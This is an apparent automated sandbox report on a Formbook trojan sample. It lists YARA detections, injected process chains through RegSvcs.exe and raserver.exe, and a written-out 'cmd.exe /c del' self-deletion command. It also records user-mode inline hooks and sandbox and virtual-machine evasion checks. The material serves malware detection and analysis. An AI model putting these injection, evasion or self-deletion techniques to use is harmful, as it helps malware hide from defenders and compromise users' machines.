            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99650 NtQueryValueKey,LdrInitializeThunk,4_2_04D99650
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04D99660
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99FE0 NtCreateMutant,LdrInitializeThunk,4_2_04D99FE0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99780 NtMapViewOfSection,LdrInitializeThunk,4_2_04D99780
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99710 NtQueryInformationToken,LdrInitializeThunk,4_2_04D99710
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D998F0 NtReadVirtualMemory,4_2_04D998F0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D998A0 NtWriteVirtualMemory,4_2_04D998A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D9B040 NtSuspendThread,4_2_04D9B040
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99820 NtEnumerateKey,4_2_04D99820
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D999D0 NtCreateProcessEx,4_2_04D999D0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D995F0 NtQueryInformationFile,4_2_04D995F0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99950 NtQueueApcThread,4_2_04D99950
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99560 NtWriteFile,4_2_04D99560
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D9AD30 NtSetContextThread,4_2_04D9AD30
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99520 NtWaitForSingleObject,4_2_04D99520
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99A80 NtOpenDirectoryObject,4_2_04D99A80
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99670 NtQueryInformationProcess,4_2_04D99670
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99610 NtEnumerateValueKey,4_2_04D99610
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99A10 NtQuerySection,4_2_04D99A10
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99A00 NtProtectVirtualMemory,4_2_04D99A00
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99A20 NtResumeThread,4_2_04D99A20
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D9A3B0 NtGetContextThread,4_2_04D9A3B0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D997A0 NtUnmapViewOfSection,4_2_04D997A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99770 NtSetInformationFile,4_2_04D99770
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D9A770 NtOpenThread,4_2_04D9A770
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99760 NtOpenProcess,4_2_04D99760
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D9A710 NtOpenProcessToken,4_2_04D9A710
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99B00 NtSetValueKey,4_2_04D99B00
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99730 NtQueryVirtualMemory,4_2_04D99730
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E19D60 NtCreateFile,4_2_00E19D60
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E19E90 NtClose,4_2_00E19E90
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E19E10 NtReadFile,4_2_00E19E10
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E19F40 NtAllocateVirtualMemory,4_2_00E19F40
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E19E8A NtClose,4_2_00E19E8A
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_0112E2660_2_0112E266
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_011265780_2_01126578
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_011265690_2_01126569
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_0112C7A80_2_0112C7A8
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_011297480_2_01129748
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_05004CC00_2_05004CC0
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_05007E280_2_05007E28
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_05008E280_2_05008E28
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_05009B800_2_05009B80
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_0500DAE80_2_0500DAE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004010301_2_00401030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041D1601_2_0041D160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DAD41_2_0041DAD4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402D901_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409E401_2_00409E40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409E3C1_2_00409E3C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041D6861_2_0041D686
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DF721_2_0041DF72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041E7CC1_2_0041E7CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402FB01_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016741201_2_01674120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165F9001_2_0165F900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017110021_2_01711002
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017228EC1_2_017228EC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A01_2_016820A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017220A81_2_017220A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B0901_2_0166B090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01722B281_2_01722B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171DBD21_2_0171DBD2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168EBB01_2_0168EBB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017222AE1_2_017222AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01721D551_2_01721D55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01650D201_2_01650D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01722D071_2_01722D07
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166D5E01_2_0166D5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017225DD1_2_017225DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016825811_2_01682581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171D4661_2_0171D466
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166841F1_2_0166841F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01721FF11_2_01721FF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01676E301_2_01676E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171D6161_2_0171D616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01722EF71_2_01722EF7
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E228EC4_2_04E228EC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6B0904_2_04D6B090
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E220A84_2_04E220A8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A04_2_04D820A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1D4664_2_04E1D466
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6841F4_2_04D6841F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E110024_2_04E11002
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6D5E04_2_04D6D5E0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E225DD4_2_04E225DD
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D825814_2_04D82581
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E21D554_2_04E21D55
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5F9004_2_04D5F900
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E22D074_2_04E22D07
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D50D204_2_04D50D20
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D741204_2_04D74120
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E22EF74_2_04E22EF7
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E222AE4_2_04E222AE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D76E304_2_04D76E30
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E21FF14_2_04E21FF1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1DBD24_2_04E1DBD2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8EBB04_2_04D8EBB0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E22B284_2_04E22B28
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E1D1604_2_00E1D160
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E02D904_2_00E02D90
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E09E404_2_00E09E40
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E09E3C4_2_00E09E3C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E02FB04_2_00E02FB0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E1DF724_2_00E1DF72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0165B150 appears 35 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04D5B150 appears 35 times
            Source: vOKMFxiCYt.exeBinary or memory string: OriginalFilename vs vOKMFxiCYt.exe
            Source: vOKMFxiCYt.exe, 00000000.00000002.240626128.0000000000622000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLqei.exe4 vs vOKMFxiCYt.exe
            Source: vOKMFxiCYt.exe, 00000000.00000002.245690399.0000000005C00000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKedermister.dllT vs vOKMFxiCYt.exe
            Source: vOKMFxiCYt.exe, 00000000.00000002.241448279.0000000000D2A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs vOKMFxiCYt.exe
            Source: vOKMFxiCYt.exeBinary or memory string: OriginalFilenameLqei.exe4 vs vOKMFxiCYt.exe
            Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: vOKMFxiCYt.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/4
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vOKMFxiCYt.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:120:WilError_01
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMutant created: \Sessions\1\BaseNamedObjects\DGxsVlh
            Source: vOKMFxiCYt.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: vOKMFxiCYt.exeReversingLabs: Detection: 35%
            Source: unknownProcess created: C:\Users\user\Desktop\vOKMFxiCYt.exe 'C:\Users\user\Desktop\vOKMFxiCYt.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: vOKMFxiCYt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: vOKMFxiCYt.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: RegSvcs.pdb, source: raserver.exe, 00000004.00000002.506744729.000000000525F000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, raserver.exe, 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, raserver.exe
            Source: Binary string: RAServer.pdb source: RegSvcs.exe, 00000001.00000002.272464370.0000000001B70000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb source: raserver.exe, 00000004.00000002.506744729.000000000525F000.00000004.00000001.sdmp
            Source: Binary string: RAServer.pdbGCTL source: RegSvcs.exe, 00000001.00000002.272464370.0000000001B70000.00000040.00000001.sdmp
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_006248FC push edx; retf 0_2_006248FD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00417A32 push es; iretd 1_2_00417A3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041CEB5 push eax; ret 1_2_0041CF08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041CF6C push eax; ret 1_2_0041CF72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041CF02 push eax; ret 1_2_0041CF08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041CF0B push eax; ret 1_2_0041CF72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016AD0D1 push ecx; ret 1_2_016AD0E4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DAD0D1 push ecx; ret 4_2_04DAD0E4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E17A32 push es; iretd 4_2_00E17A3B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E1CEB5 push eax; ret 4_2_00E1CF08
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E1CF6C push eax; ret 4_2_00E1CF72
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E1CF02 push eax; ret 4_2_00E1CF08
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E1CF0B push eax; ret 4_2_00E1CF72
            Source: initial sampleStatic PE information: section name: .text entropy: 7.62841280925

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE5
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241858795.0000000002AC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vOKMFxiCYt.exe PID: 2764, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
